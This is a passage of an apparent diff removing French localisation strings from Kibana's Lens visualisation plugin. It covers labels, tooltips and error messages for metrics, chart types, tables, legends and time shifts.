Par exemple, 3h pour 3 heures", - "xpack.lens.indexPattern.lastValue": "Dernière valeur", - "xpack.lens.indexPattern.lastValue.disabled": "Cette fonction requiert la présence d'un champ de date dans la vue de données.", - "xpack.lens.indexPattern.lastValue.invalidTypeSortField": "Le champ {invalidField} n'est pas un champ de date et ne peut pas être utilisé pour le tri", - "xpack.lens.indexPattern.lastValue.showArrayValues": "Afficher les valeurs de tableau", - "xpack.lens.indexPattern.lastValue.showArrayValuesExplanation": "Affiche toutes les valeurs associées à ce champ dans chaque dernier document.", - "xpack.lens.indexPattern.lastValue.showArrayValuesWithTopValuesWarning": "Lorsque vous affichez les valeurs de tableau, vous ne pouvez pas utiliser ce champ pour classer les valeurs les plus élevées.", - "xpack.lens.indexPattern.lastValue.signature": "champ : chaîne", - "xpack.lens.indexPattern.lastValue.sortField": "Trier par le champ de date", - "xpack.lens.indexPattern.lastValue.sortFieldNotFound": "Champ {invalidField} introuvable", - "xpack.lens.indexPattern.lastValue.sortFieldPlaceholder": "Champ de tri", - "xpack.lens.indexPattern.lastValueOf": "Dernière valeur de {name}", - "xpack.lens.indexPattern.layerErrorWrapper": "Erreur de {position} pour le calque : {wrappedMessage}", - "xpack.lens.indexPattern.max": "Maximum", - "xpack.lens.indexPattern.max.description": "Agrégation d'indicateurs à valeur unique qui renvoie la valeur maximale des valeurs numériques extraites des documents agrégés.", - "xpack.lens.indexPattern.maxOf": "Maximum de {name}", - "xpack.lens.indexPattern.median": "Médiane", - "xpack.lens.indexPattern.median.description": "Agrégation d'indicateurs à valeur unique qui calcule la valeur médiane des valeurs numériques extraites des documents agrégés.", - "xpack.lens.indexPattern.medianOf": "Médiane de {name}", - "xpack.lens.indexPattern.metaFieldsLabel": "Champs méta", - "xpack.lens.indexPattern.metric.signature": "champ : chaîne", - 
"xpack.lens.indexPattern.min": "Minimum", - "xpack.lens.indexPattern.min.description": "Agrégation d'indicateurs à valeur unique qui renvoie la valeur minimale des valeurs numériques extraites des documents agrégés.", - "xpack.lens.indexPattern.minOf": "Minimum de {name}", - "xpack.lens.indexPattern.missingDataView": "{count, plural, one {Vue de données} other {Vues de données}} ({count, plural, one {id} other {ids}} : {indexpatterns}) {count, plural, one {introuvable} other {introuvables}}", - "xpack.lens.indexPattern.missingFieldLabel": "Champ manquant", - "xpack.lens.indexPattern.missingReferenceError": "\"{dimensionLabel}\" n'est pas entièrement configuré", - "xpack.lens.indexPattern.moveToWorkspace": "Ajouter {field} à l'espace de travail", - "xpack.lens.indexPattern.moveToWorkspaceDisabled": "Ce champ ne peut pas être ajouté automatiquement à l'espace de travail. Vous pouvez toujours l'utiliser directement dans le panneau de configuration.", - "xpack.lens.indexPattern.moving_average.signature": "indicateur : nombre, [window] : nombre", - "xpack.lens.indexPattern.movingAverage": "Moyenne mobile", - "xpack.lens.indexPattern.movingAverage.basicExplanation": "La moyenne mobile fait glisser une fenêtre sur les données et affiche la valeur moyenne. La moyenne mobile est prise en charge uniquement par les histogrammes des dates.", - "xpack.lens.indexPattern.movingAverage.limitations": "La première valeur de moyenne mobile commence au deuxième élément.", - "xpack.lens.indexPattern.movingAverage.longerExplanation": "Pour calculer la moyenne mobile, Lens utilise la moyenne de la fenêtre et applique une politique d'omission pour les blancs. 
Pour les valeurs manquantes, le groupe est ignoré, et le calcul est effectué sur la valeur suivante.", - "xpack.lens.indexPattern.movingAverage.tableExplanation": "Par exemple, avec les données [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], vous pouvez calculer une moyenne mobile simple avec une taille de fenêtre de 5 :", - "xpack.lens.indexPattern.movingAverage.titleHelp": "Fonctionnement de la moyenne mobile", - "xpack.lens.indexPattern.movingAverage.window": "Taille de fenêtre", - "xpack.lens.indexPattern.movingAverage.windowInitialPartial": "La fenêtre est partielle jusqu'à ce qu'elle atteigne le nombre demandé d'éléments. Par exemple, avec une taille de fenêtre de 5 :", - "xpack.lens.indexPattern.movingAverage.windowLimitations": "La fenêtre n'inclut pas la valeur actuelle.", - "xpack.lens.indexPattern.movingAverageOf": "Moyenne mobile de {name}", - "xpack.lens.indexPattern.multipleDateHistogramsError": "\"{dimensionLabel}\" n'est pas le seul histogramme des dates. Lorsque vous utilisez des décalages, veillez à n'utiliser qu'un seul histogramme des dates.", - "xpack.lens.indexPattern.multipleTermsOf": "Les valeurs les plus élevées de {name} + {count} {count, plural, one {autre} other {autres}}", - "xpack.lens.indexPattern.noDataViewDescription": "Veuillez créer une vue de données ou basculer vers une autre source de données.", - "xpack.lens.indexPattern.noDataViewsLabel": "Aucune vue de données", - "xpack.lens.indexPattern.noRealMetricError": "Un calque uniquement doté de valeurs statiques n’affichera pas de résultats ; utilisez au moins un indicateur dynamique.", - "xpack.lens.indexPattern.numberFormatLabel": "Nombre", - "xpack.lens.indexPattern.ofDocumentsLabel": "documents", - "xpack.lens.indexPattern.operationsNotFound": "{operationLength, plural, one {Opération} other {Opérations}} {operationsList} non trouvée(s)", - "xpack.lens.indexPattern.otherDocsLabel": "Autre", - "xpack.lens.indexPattern.overall_metric": "indicateur : nombre", - 
"xpack.lens.indexPattern.overallAverageOf": "Moyenne générale de {name}", - "xpack.lens.indexPattern.overallMax": "Max général", - "xpack.lens.indexPattern.overallMaxOf": "Max général de {name}", - "xpack.lens.indexPattern.overallMin": "Min général", - "xpack.lens.indexPattern.overallMinOf": "Min général de {name}", - "xpack.lens.indexPattern.overallSum": "Somme générale", - "xpack.lens.indexPattern.overallSumOf": "Somme générale de {name}", - "xpack.lens.indexPattern.percentageOfLabel": "{percentage} % de", - "xpack.lens.indexPattern.percentFormatLabel": "Pour cent", - "xpack.lens.indexPattern.percentile": "Centile", - "xpack.lens.indexPattern.percentile.errorMessage": "Le centile doit être un entier compris entre 1 et 99", - "xpack.lens.indexPattern.percentile.percentileValue": "Centile", - "xpack.lens.indexPattern.percentile.signature": "champ : chaîne, [percentile] : nombre", - "xpack.lens.indexPattern.percentileOf": "{percentile, selectordinal, one {#er} two {#e} few {#e} other {#e}} centile de {name}", - "xpack.lens.indexPattern.pinnedTopValuesLabel": "Filtres de {field}", - "xpack.lens.indexPattern.precisionErrorWarning.accuracyDisabled": "{name} peut être une approximation. Vous pouvez activer le mode de précision pour obtenir des résultats plus fins, mais notez que ce mode augmente la charge sur le cluster Elasticsearch. {learnMoreLink}", - "xpack.lens.indexPattern.precisionErrorWarning.accuracyEnabled": "{name} peut être une approximation. Pour obtenir des résultats plus précis, essayez d'augmenter le nombre de {topValues} ou d'utiliser des {filters} à la place. 
{learnMoreLink}", - "xpack.lens.indexPattern.precisionErrorWarning.filters": "filtres", - "xpack.lens.indexPattern.precisionErrorWarning.link": "En savoir plus.", - "xpack.lens.indexPattern.precisionErrorWarning.topValues": "valeurs les plus élevées", - "xpack.lens.indexPattern.quickFunctionsLabel": "Fonctions rapides", - "xpack.lens.indexPattern.range.isInvalid": "Cette plage n'est pas valide", - "xpack.lens.indexPattern.ranges.addRange": "Ajouter une plage", - "xpack.lens.indexPattern.ranges.customIntervalsToggle": "Créer des plages personnalisées", - "xpack.lens.indexPattern.ranges.customRangeLabelPlaceholder": "Étiquette personnalisée", - "xpack.lens.indexPattern.ranges.customRanges": "Plages", - "xpack.lens.indexPattern.ranges.customRangesRemoval": "Retirer les plages personnalisées", - "xpack.lens.indexPattern.ranges.decreaseButtonLabel": "Diminuer la granularité", - "xpack.lens.indexPattern.ranges.deleteRange": "Supprimer la plage", - "xpack.lens.indexPattern.ranges.granularity": "Granularité des intervalles", - "xpack.lens.indexPattern.ranges.granularityHelpText": "Fonctionnement", - "xpack.lens.indexPattern.ranges.granularityPopoverAdvancedExplanation": "Les intervalles sont incrémentés par 10, 5 ou 2. Par exemple, un intervalle peut être 100 ou 0,2 .", - "xpack.lens.indexPattern.ranges.granularityPopoverBasicExplanation": "La granularité des intervalles divise le champ en intervalles régulièrement espacés sur la base des valeurs minimales et maximales du champ.", - "xpack.lens.indexPattern.ranges.granularityPopoverExplanation": "La taille de l'intervalle est une valeur de \"gentillesse\". Lorsque la granularité du curseur change, l'intervalle reste le même lorsque l'intervalle de \"gentillesse\" est le même. La granularité minimale est 1, et la valeur maximale est {setting}. 
Pour modifier la granularité maximale, accédez aux Paramètres avancés.", - "xpack.lens.indexPattern.ranges.granularityPopoverTitle": "Fonctionnement de la granularité des intervalles", - "xpack.lens.indexPattern.ranges.includeEmptyRows": "Inclure les lignes vides", - "xpack.lens.indexPattern.ranges.increaseButtonLabel": "Augmenter la granularité", - "xpack.lens.indexPattern.ranges.lessThanOrEqualAppend": "≤", - "xpack.lens.indexPattern.ranges.lessThanOrEqualTooltip": "Inférieur ou égal à", - "xpack.lens.indexPattern.ranges.lessThanPrepend": "<", - "xpack.lens.indexPattern.ranges.lessThanTooltip": "Inférieur à", - "xpack.lens.indexPattern.rareTermsOf": "Valeurs rares de {name}", - "xpack.lens.indexPattern.records": "Enregistrements", - "xpack.lens.indexPattern.referenceFunctionPlaceholder": "Sous-fonction", - "xpack.lens.indexPattern.removeColumnLabel": "Retirer la configuration de \"{groupLabel}\"", - "xpack.lens.indexPattern.removeFieldLabel": "Retirer le champ de la vue de données", - "xpack.lens.indexPattern.sortField.invalid": "Champ non valide. 
Vérifiez votre vue de données ou choisissez un autre champ.", - "xpack.lens.indexPattern.staticValue.label": "Valeur de la ligne de référence", - "xpack.lens.indexPattern.staticValueError": "La valeur statique de {value} n’est pas un nombre valide.", - "xpack.lens.indexPattern.staticValueLabel": "Valeur statique", - "xpack.lens.indexPattern.staticValueLabelDefault": "Valeur statique", - "xpack.lens.indexPattern.staticValueLabelWithValue": "Valeur statique : {value}", - "xpack.lens.indexPattern.staticValueWarning": "Valeur statique actuellement appliquée", - "xpack.lens.indexPattern.staticValueWarningText": "Pour écraser la valeur statique, sélectionnez une fonction rapide.", - "xpack.lens.indexPattern.suffixLabel": "Suffixe", - "xpack.lens.indexPattern.suggestedValueAriaLabel": "Valeur suggérée : {value} pour {groupLabel}", - "xpack.lens.indexpattern.suggestions.nestingChangeLabel": "{innerOperation} pour chaque {outerOperation}", - "xpack.lens.indexpattern.suggestions.overallLabel": "{operation} générale", - "xpack.lens.indexpattern.suggestions.overTimeLabel": "Sur la durée", - "xpack.lens.indexPattern.sum": "Somme", - "xpack.lens.indexPattern.sum.description": "Agrégation d'indicateurs à valeur unique qui récapitule les valeurs numériques extraites des documents agrégés.", - "xpack.lens.indexPattern.sumOf": "Somme de {name}", - "xpack.lens.indexPattern.switchToRare": "Classer par rareté", - "xpack.lens.indexPattern.terms": "Valeurs les plus élevées", - "xpack.lens.indexPattern.terms.accuracyModeDescription": "Activer le mode de précision", - "xpack.lens.indexPattern.terms.accuracyModeHelp": "Améliore les données à haute cardinalité, mais augmente la charge sur le cluster Elasticsearch.", - "xpack.lens.indexPattern.terms.addaFilter": "Ajouter un champ", - "xpack.lens.indexPattern.terms.advancedSettings": "Avancé", - "xpack.lens.indexPattern.terms.chooseFields": "{count, plural, zero {Champ} other {Champs}}", - "xpack.lens.indexPattern.terms.deleteButtonAriaLabel": 
"Supprimer", - "xpack.lens.indexPattern.terms.deleteButtonDisabled": "Cette fonction nécessite au minimum un champ défini.", - "xpack.lens.indexPattern.terms.deleteButtonLabel": "Supprimer", - "xpack.lens.indexPattern.terms.dragToReorder": "Faire glisser pour réorganiser", - "xpack.lens.indexPattern.terms.invalidFieldsErrorShort": "{invalidFieldsCount, plural, one {Champ invalide} other {Champs invalides}} : {invalidFields}. Vérifiez votre vue de données ou choisissez un autre champ.", - "xpack.lens.indexPattern.terms.maxDocCount": "Nombre de documents maximum par terme", - "xpack.lens.indexPattern.terms.missingBucketDescription": "Inclure les documents sans ce champ", - "xpack.lens.indexPattern.terms.missingLabel": "(valeur manquante)", - "xpack.lens.indexPattern.terms.orderAlphabetical": "Alphabétique", - "xpack.lens.indexPattern.terms.orderAscending": "Croissant", - "xpack.lens.indexPattern.terms.orderBy": "Classer par", - "xpack.lens.indexPattern.terms.orderByHelp": "Spécifie la dimension selon laquelle les valeurs les plus élevées sont classées.", - "xpack.lens.indexPattern.terms.orderDescending": "Décroissant", - "xpack.lens.indexPattern.terms.orderDirection": "Sens de classement", - "xpack.lens.indexPattern.terms.orderRare": "Rareté", - "xpack.lens.indexPattern.terms.otherBucketDescription": "Regrouper les autres valeurs sous \"Autre\"", - "xpack.lens.indexPattern.terms.otherLabel": "Autre", - "xpack.lens.indexPattern.terms.scriptedFieldErrorShort": "Les champs scriptés ne sont pas pris en charge en cas d’utilisation de champs multiples.", - "xpack.lens.indexPattern.terms.size": "Nombre de valeurs", - "xpack.lens.indexPattern.terms.sizeLimitMax": "La valeur est supérieure au maximum {max} ; elle est remplacée par la valeur maximale.", - "xpack.lens.indexPattern.terms.sizeLimitMin": "La valeur est inférieure au minimum {min} ; elle est remplacée par la valeur minimale.", - "xpack.lens.indexPattern.termsOf": "{numberOfTermsLabel} {termsCount, plural, one 
{valeur la plus élevée} other {valeurs les plus élevées}} de {name}", - "xpack.lens.indexPattern.termsWithMultipleShifts": "Dans un seul calque, il est impossible de combiner des indicateurs avec des décalages temporels différents et des valeurs dynamiques les plus élevées. Utilisez la même valeur de décalage pour tous les indicateurs, ou utilisez des filtres à la place des valeurs les plus élevées.", - "xpack.lens.indexPattern.termsWithMultipleShiftsFixActionLabel": "Utiliser des filtres", - "xpack.lens.indexPattern.termsWithMultipleTermsAndScriptedFields": "Les champs scriptés ne sont pas pris en charge lors de l’utilisation de champs multiples ; {fields} trouvés.", - "xpack.lens.indexPattern.time_scale": "indicateur : nombre, unité : s|m|h|d|w|M|y", - "xpack.lens.indexPattern.timeScale": "Normaliser par unité", - "xpack.lens.indexPattern.timeScale.label": "Normaliser par unité", - "xpack.lens.indexPattern.timeScale.missingUnit": "Aucune unité spécifiée pour Normaliser par unité.", - "xpack.lens.indexPattern.timeScale.tooltip": "Normalisez les valeurs pour qu'elles soient toujours affichées en tant que taux par unité de temps spécifiée, indépendamment de l'intervalle de dates sous-jacent.", - "xpack.lens.indexPattern.timeScale.wrongUnit": "Unité spécifiée inconnue, utilisez s,m,h ou d.", - "xpack.lens.indexPattern.timeShift.12hours": "Il y a 12 heures (12h)", - "xpack.lens.indexPattern.timeShift.3hours": "Il y a 3 heures (3h)", - "xpack.lens.indexPattern.timeShift.3months": "Il y a 3 mois (3M)", - "xpack.lens.indexPattern.timeShift.6hours": "Il y a 6 heures (6h)", - "xpack.lens.indexPattern.timeShift.6months": "Il y a 6 mois (6M)", - "xpack.lens.indexPattern.timeShift.day": "Il y a 1 jour (1d)", - "xpack.lens.indexPattern.timeShift.genericInvalidHelp": "La valeur de décalage temporel n’est pas valide.", - "xpack.lens.indexPattern.timeShift.help": "Entrer le nombre et l'unité du décalage temporel", - "xpack.lens.indexPattern.timeShift.hour": "Il y a 1 heure (1h)", 
- "xpack.lens.indexPattern.timeShift.label": "Décalage temporel", - "xpack.lens.indexPattern.timeShift.month": "Il y a 1 mois (1M)", - "xpack.lens.indexPattern.timeShift.noMultipleHelp": "Le décalage temporel doit être un multiple de l'intervalle de l'histogramme des dates. Ajustez le décalage ou l'intervalle de l'histogramme des dates", - "xpack.lens.indexPattern.timeShift.previous": "Plage temporelle précédente", - "xpack.lens.indexPattern.timeShift.tooSmallHelp": "Le décalage temporel doit être supérieur à l'intervalle de l'histogramme des dates. Augmentez le décalage ou spécifiez un intervalle plus petit dans l'histogramme des dates", - "xpack.lens.indexPattern.timeShift.week": "Il y a 1 semaine (1w)", - "xpack.lens.indexPattern.timeShift.year": "Il y a 1 an (1y)", - "xpack.lens.indexPattern.timeShiftMultipleWarning": "{label} utilise un décalage temporel de {columnTimeShift} qui n'est pas un multiple de l'intervalle de l'histogramme des dates de {interval}. Pour éviter une non-correspondance des données, utilisez un multiple de {interval} comme décalage.", - "xpack.lens.indexPattern.timeShiftPlaceholder": "Saisissez des valeurs personnalisées (par ex. 8w)", - "xpack.lens.indexPattern.timeShiftSmallWarning": "{label} utilise un décalage temporel de {columnTimeShift} qui est inférieur à l'intervalle de l'histogramme des dates de {interval}. Pour éviter une non-correspondance des données, utilisez un multiple de {interval} comme décalage.", - "xpack.lens.indexPattern.uniqueLabel": "{label} [{num}]", - "xpack.lens.indexPattern.useAsTopLevelAgg": "Regrouper d'abord en fonction de ce champ", - "xpack.lens.indexPatterns.clearFiltersLabel": "Effacer le nom et saisissez les filtres", - "xpack.lens.indexPatterns.fieldFiltersLabel": "Filtrer par type", - "xpack.lens.indexPatterns.fieldSearchLiveRegion": "{availableFields} {availableFields, plural, one {champ} other {champs}} disponible(s). {emptyFields} {emptyFields, plural, one {champ} other {champs}} vide(s). 
{metaFields} {metaFields, plural, one {champ} other {champs}} méta.", - "xpack.lens.indexPatterns.filterByNameLabel": "Rechercher les noms de champs", - "xpack.lens.indexPatterns.noAvailableDataLabel": "Aucun champ disponible ne contient de données.", - "xpack.lens.indexPatterns.noDataLabel": "Aucun champ.", - "xpack.lens.indexPatterns.noEmptyDataLabel": "Aucun champ vide.", - "xpack.lens.indexPatterns.noFields.extendTimeBullet": "Extension de la plage temporelle", - "xpack.lens.indexPatterns.noFields.fieldTypeFilterBullet": "Utilisation de différents filtres de champ", - "xpack.lens.indexPatterns.noFields.globalFiltersBullet": "Modification des filtres globaux", - "xpack.lens.indexPatterns.noFields.tryText": "Essayer :", - "xpack.lens.indexPatterns.noFieldsLabel": "Aucun champ n'existe dans cette vue de données.", - "xpack.lens.indexPatterns.noFilteredFieldsLabel": "Aucun champ ne correspond aux filtres sélectionnés.", - "xpack.lens.indexPatterns.noMetaDataLabel": "Aucun champ méta.", - "xpack.lens.indexPatternSuggestion.removeLayerLabel": "Afficher uniquement {indexPatternTitle}", - "xpack.lens.indexPatternSuggestion.removeLayerPositionLabel": "Afficher uniquement le calque {layerNumber}", - "xpack.lens.label.gauge.labelMajor.header": "Titre", - "xpack.lens.label.gauge.labelMinor.header": "Sous-titre", - "xpack.lens.label.header": "Étiquette", - "xpack.lens.label.shared.axisHeader": "Titre de l'axe", - "xpack.lens.labelInput.label": "Étiquette", - "xpack.lens.layerPanel.layerVisualizationType": "Type de visualisation du calque", - "xpack.lens.layerPanel.missingDataView": "Vue de données introuvable", - "xpack.lens.legacyUrlConflict.objectNoun": "Visualisation Lens", - "xpack.lens.lensSavedObjectLabel": "Visualisation Lens", - "xpack.lens.lineMarker.positionRequirementTooltip": "Vous devez sélectionner une icône ou afficher le nom pour pouvoir en modifier la position.", - "xpack.lens.lineMarker.textVisibility": "Décoration du texte", - 
"xpack.lens.metric.addLayer": "Visualisation", - "xpack.lens.metric.dynamicColoring.label": "Couleur par valeur", - "xpack.lens.metric.groupLabel": "Valeur d’objectif et unique", - "xpack.lens.metric.label": "Indicateur", - "xpack.lens.pageTitle": "Lens", - "xpack.lens.paletteHeatmapGradient.customize": "Modifier", - "xpack.lens.paletteHeatmapGradient.customizeLong": "Modifier la palette", - "xpack.lens.paletteHeatmapGradient.label": "Couleur", - "xpack.lens.paletteMetricGradient.label": "Couleur", - "xpack.lens.palettePicker.label": "Palette de couleurs", - "xpack.lens.paletteTableGradient.customize": "Modifier", - "xpack.lens.paletteTableGradient.label": "Couleur", - "xpack.lens.pie.addLayer": "Visualisation", - "xpack.lens.pie.arrayValues": "{label} contient des valeurs de tableau. Le rendu de votre visualisation peut ne pas se présenter comme attendu.", - "xpack.lens.pie.donutLabel": "Graphique en anneau", - "xpack.lens.pie.groupLabel": "Proportion", - "xpack.lens.pie.groupsizeLabel": "Taille par", - "xpack.lens.pie.mosaiclabel": "Mosaïque", - "xpack.lens.pie.mosaicSuggestionLabel": "En mosaïque", - "xpack.lens.pie.pielabel": "Camembert", - "xpack.lens.pie.sliceGroupLabel": "Section par", - "xpack.lens.pie.smallValuesWarningMessage": "Les graphiques en gaufre ne permettent pas d’afficher correctement les petites valeurs de champ. 
Pour afficher toutes les valeurs de champ, utilisez le tableau de données ou le compartimentage.", - "xpack.lens.pie.suggestionLabel": "Comme {chartName}", - "xpack.lens.pie.treemapGroupLabel": "Regrouper par", - "xpack.lens.pie.treemaplabel": "Compartimentage", - "xpack.lens.pie.treemapSuggestionLabel": "Comme compartimentage", - "xpack.lens.pie.wafflelabel": "Gaufre", - "xpack.lens.pie.waffleSuggestionLabel": "En gaufre", - "xpack.lens.pieChart.categoriesInLegendLabel": "Masquer les étiquettes", - "xpack.lens.pieChart.emptySizeRatioLabel": "Taille de la zone intérieure", - "xpack.lens.pieChart.emptySizeRatioOptions.large": "Large", - "xpack.lens.pieChart.emptySizeRatioOptions.medium": "Moyenne", - "xpack.lens.pieChart.emptySizeRatioOptions.small": "Petite", - "xpack.lens.pieChart.fitInsideOnlyLabel": "À l'intérieur uniquement", - "xpack.lens.pieChart.hiddenNumbersLabel": "Masquer dans le graphique", - "xpack.lens.pieChart.labelPositionLabel": "Position", - "xpack.lens.pieChart.legendVisibility.auto": "Auto", - "xpack.lens.pieChart.legendVisibility.hide": "Masquer", - "xpack.lens.pieChart.legendVisibility.show": "Afficher", - "xpack.lens.pieChart.nestedLegendLabel": "Imbriqué", - "xpack.lens.pieChart.numberLabels": "Valeurs", - "xpack.lens.pieChart.percentDecimalsLabel": "Nombre maximal de décimales pour les pourcentages", - "xpack.lens.pieChart.showCategoriesLabel": "Intérieur ou extérieur", - "xpack.lens.pieChart.showFormatterValuesLabel": "Afficher la valeur", - "xpack.lens.pieChart.showPercentValuesLabel": "Afficher le pourcentage", - "xpack.lens.pieChart.showTreemapCategoriesLabel": "Afficher les étiquettes", - "xpack.lens.pieChart.valuesLabel": "Étiquettes", - "xpack.lens.pieChart.visualOptionsLabel": "Options visuelles", - "xpack.lens.resetLayerAriaLabel": "Réinitialiser le calque {index}", - "xpack.lens.resetVisualizationAriaLabel": "Réinitialiser la visualisation", - "xpack.lens.saveDuplicateRejectedDescription": "La confirmation d'enregistrement avec un 
doublon de titre a été rejetée.", - "xpack.lens.searchTitle": "Lens : créer des visualisations", - "xpack.lens.section.configPanelLabel": "Panneau de configuration", - "xpack.lens.section.dataPanelLabel": "Panneau de données", - "xpack.lens.section.workspaceLabel": "Espace de travail de visualisation", - "xpack.lens.settings.autoApply": "Appliquer automatiquement les modifications de la visualisation", - "xpack.lens.settings.title": "Paramètres Lens", - "xpack.lens.shared.AppearanceLabel": "Apparence", - "xpack.lens.shared.axisNameLabel": "Titre de l'axe", - "xpack.lens.shared.chartValueLabelVisibilityLabel": "Étiquettes", - "xpack.lens.shared.curveLabel": "Options visuelles", - "xpack.lens.shared.legend.filterForValueButtonAriaLabel": "Filtre pour la valeur", - "xpack.lens.shared.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", - "xpack.lens.shared.legend.filterOutValueButtonAriaLabel": "Filtrer la valeur", - "xpack.lens.shared.legendAlignmentLabel": "Alignement", - "xpack.lens.shared.legendInsideAlignmentLabel": "Alignement", - "xpack.lens.shared.legendInsideColumnsLabel": "Nombre de colonnes", - "xpack.lens.shared.legendInsideLocationAlignmentLabel": "Alignement", - "xpack.lens.shared.legendLabel": "Légende", - "xpack.lens.shared.legendLocationBottomLeft": "En bas à gauche", - "xpack.lens.shared.legendLocationBottomRight": "En bas à droite", - "xpack.lens.shared.legendLocationLabel": "Emplacement", - "xpack.lens.shared.legendLocationTopLeft": "En haut à gauche", - "xpack.lens.shared.legendLocationTopRight": "En haut à droite", - "xpack.lens.shared.legendPositionBottom": "Bas", - "xpack.lens.shared.legendPositionLeft": "Gauche", - "xpack.lens.shared.legendPositionRight": "Droite", - "xpack.lens.shared.legendPositionTop": "Haut", - "xpack.lens.shared.legendSizeSetting.label": "Largeur de la légende", - "xpack.lens.shared.legendSizeSetting.legendSizeOptions.auto": "Auto", - "xpack.lens.shared.legendSizeSetting.legendSizeOptions.extraLarge": 
"Très grande", - "xpack.lens.shared.legendSizeSetting.legendSizeOptions.large": "Large", - "xpack.lens.shared.legendSizeSetting.legendSizeOptions.medium": "Moyenne", - "xpack.lens.shared.legendSizeSetting.legendSizeOptions.small": "Petite", - "xpack.lens.shared.legendVisibilityLabel": "Affichage", - "xpack.lens.shared.maxLinesLabel": "Nombre maximal de lignes", - "xpack.lens.shared.metric.appearanceLabel": "Apparence", - "xpack.lens.shared.nestedLegendLabel": "Imbriqué", - "xpack.lens.shared.overwriteAxisTitle": "Écraser le titre de l'axe", - "xpack.lens.shared.ticksPositionOptions": "Coches sur les bandes", - "xpack.lens.shared.ticksPositionOptionsTooltip": "Place les coches sur chaque bordure de bande au lieu de les répartir de manière homogène.", - "xpack.lens.shared.truncateLegend": "Tronquer le texte", - "xpack.lens.shared.valueInLegendLabel": "Afficher la valeur", - "xpack.lens.shared.valueLabelsVisibility.auto": "Masquer", - "xpack.lens.shared.valueLabelsVisibility.inside": "Afficher", - "xpack.lens.sugegstion.refreshSuggestionLabel": "Actualiser", - "xpack.lens.suggestion.refreshSuggestionTooltip": "Actualisez les suggestions en fonction de la visualisation sélectionnée.", - "xpack.lens.suggestions.applyChangesLabel": "Appliquer les modifications", - "xpack.lens.suggestions.applyChangesPrompt": "Les toutes dernières modifications doivent être appliquées pour afficher les suggestions.", - "xpack.lens.suggestions.currentVisLabel": "Visualisation en cours", - "xpack.lens.table.actionsLabel": "Afficher les actions", - "xpack.lens.table.alignment.center": "Centre", - "xpack.lens.table.alignment.label": "Alignement du texte", - "xpack.lens.table.alignment.left": "Gauche", - "xpack.lens.table.alignment.right": "Droite", - "xpack.lens.table.columnFilter.filterForValueText": "Filtre pour la colonne", - "xpack.lens.table.columnFilter.filterOutValueText": "Filtrer la colonne", - "xpack.lens.table.columnVisibilityLabel": "Masquer la colonne", - 
"xpack.lens.table.defaultAriaLabel": "Visualisation du tableau de données", - "xpack.lens.table.dynamicColoring.cell": "Cellule", - "xpack.lens.table.dynamicColoring.label": "Couleur par valeur", - "xpack.lens.table.dynamicColoring.none": "Aucun", - "xpack.lens.table.dynamicColoring.text": "Texte", - "xpack.lens.table.hide.hideLabel": "Masquer", - "xpack.lens.table.palettePanelContainer.back": "Retour", - "xpack.lens.table.palettePanelTitle": "Modifier la couleur", - "xpack.lens.table.resize.reset": "Réinitialiser la largeur", - "xpack.lens.table.rowHeight.auto": "Ajustement automatique", - "xpack.lens.table.rowHeight.custom": "Personnalisé", - "xpack.lens.table.rowHeight.single": "Unique", - "xpack.lens.table.sort.ascLabel": "Trier dans l'ordre croissant", - "xpack.lens.table.sort.descLabel": "Trier dans l'ordre décroissant", - "xpack.lens.table.summaryRow.average": "Moyenne", - "xpack.lens.table.summaryRow.count": "Compte de valeurs", - "xpack.lens.table.summaryRow.customlabel": "Étiquette de résumé", - "xpack.lens.table.summaryRow.label": "Ligne de résumé", - "xpack.lens.table.summaryRow.maximum": "Maximum", - "xpack.lens.table.summaryRow.minimum": "Minimum", - "xpack.lens.table.summaryRow.none": "Aucune", - "xpack.lens.table.summaryRow.sum": "Somme", - "xpack.lens.table.tableCellFilter.filterForValueAriaLabel": "Filtre pour la valeur : {cellContent}", - "xpack.lens.table.tableCellFilter.filterForValueText": "Filtrer sur la valeur", - "xpack.lens.table.tableCellFilter.filterOutValueAriaLabel": "Exclure la valeur : {cellContent}", - "xpack.lens.table.tableCellFilter.filterOutValueText": "Exclure la valeur", - "xpack.lens.table.valuesVisualOptions": "Options visuelles", - "xpack.lens.table.visualOptionsFitRowToContentLabel": "Hauteur de ligne de cellule", - "xpack.lens.table.visualOptionsHeaderRowHeightLabel": "Hauteur de ligne d’en-tête", - "xpack.lens.table.visualOptionsPaginateTable": "Paginer le tableau", - "xpack.lens.table.visualOptionsPaginateTableTooltip": 
"La pagination est masquée lorsqu’il y a moins de 10 éléments.", - "xpack.lens.TSVBLabel": "TSVB", - "xpack.lens.uniqueLabel": "{label} [{num}]", - "xpack.lens.unknownVisType.shortMessage": "Type de visualisation inconnu", - "xpack.lens.visTypeAlias.description": "Créez des visualisations avec notre éditeur de glisser-déposer. Basculez entre les différents types de visualisation à tout moment.", - "xpack.lens.visTypeAlias.note": "Recommandé pour la plupart des utilisateurs.", - "xpack.lens.visTypeAlias.title": "Lens", - "xpack.lens.visTypeAlias.type": "Lens", - "xpack.lens.visualizeGeoFieldMessage": "Lens ne peut pas visualiser les champs {fieldType}", - "xpack.lens.visualizeTSVBLegend": "Visualiser le graphique TSVB", - "xpack.lens.xyChart.addAnnotationsLayerLabel": "Annotations", - "xpack.lens.xyChart.addAnnotationsLayerLabelDisabledHelp": "Les annotations nécessitent un graphique temporel pour fonctionner. Ajoutez un histogramme de dates.", - "xpack.lens.xyChart.addDataLayerLabel": "Visualisation", - "xpack.lens.xyChart.addLayer": "Ajouter un calque", - "xpack.lens.xyChart.addLayerTooltip": "Utilisez plusieurs calques pour combiner les types de visualisation ou pour visualiser différentes vues de données.", - "xpack.lens.xyChart.addReferenceLineLayerLabel": "Lignes de référence", - "xpack.lens.xyChart.addReferenceLineLayerLabelDisabledHelp": "Ajouter des données pour activer le calque de référence", - "xpack.lens.xyChart.annotation.name": "Masquer l’annotation", - "xpack.lens.xyChart.annotationDate": "Date de l’annotation", - "xpack.lens.xyChart.annotationDate.from": "De", - "xpack.lens.xyChart.annotationDate.to": "À", - "xpack.lens.xyChart.appearance": "Apparence", - "xpack.lens.xyChart.applyAsRange": "Appliquer en tant que plage", - "xpack.lens.xyChart.axisExtent.custom": "Personnalisé", - "xpack.lens.xyChart.axisExtent.dataBounds": "Données", - "xpack.lens.xyChart.axisExtent.disabledDataBoundsMessage": "Seuls les graphiques linéaires peuvent être adaptés aux 
